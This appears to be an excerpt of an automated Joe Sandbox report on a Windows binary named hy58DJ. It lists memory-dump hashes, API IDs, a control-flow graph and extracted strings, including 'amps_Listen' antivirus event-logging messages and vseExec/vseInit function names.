                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 203985260-0
                                      • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                      • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                      • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                      • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                      • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                      • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                      • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                      • Instruction ID: 25076adbd17fdbd45967520347dd14d5753f90de6adde7b75f7ccafe87ea262d
                                      • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                      • Instruction Fuzzy Hash: DA51FA62B08B8145FB10AB73A8445BE7BA0BB40FE8F1441B6EE5C27BA5DE3CD411C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: EntryFunctionLookup
                                      • String ID:
                                      • API String ID: 3852435196-0
                                      • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                      • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                      • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                      • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                      • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                      • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                      • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0
                                      • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                      • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                      • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                      • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                      • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                      • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                      • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                      • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                      • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                      • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                      • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                      • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                      • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                      • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                      • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                      • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                      • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                      • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                      • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -
                                      • API String ID: 0-2547889144
                                      • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                      • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                      • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                      • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                      • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                      • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                      • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                      • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                      • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                      • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                      • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                      • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                      • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                      • Instruction ID: 74460c57337afac52850004082f4da3ef208b7a0bb4cf03254ee0d379adf64a2
                                      • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                      • Instruction Fuzzy Hash: A7F068B17196568BDBA48F29B443A3977E0E758790F9480BAD59D83B14D63C90618F04

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                      • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                      • API String ID: 1021822269-3147033232
                                      • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                      • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                      • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                      • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                      • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                      • API String ID: 883923345-381368982
                                      • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                      • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                      • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                      • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                      • String ID:
                                      • API String ID: 1613947383-0
                                      • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                      • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                      • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                      • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                      • String ID:
                                      • API String ID: 1995290849-0
                                      • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                      • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                      • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                      • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                      • String ID:
                                      • API String ID: 1995290849-0
                                      • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                      • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                      • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                      • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                      APIs
                                      Strings
                                      Memory Dump Source
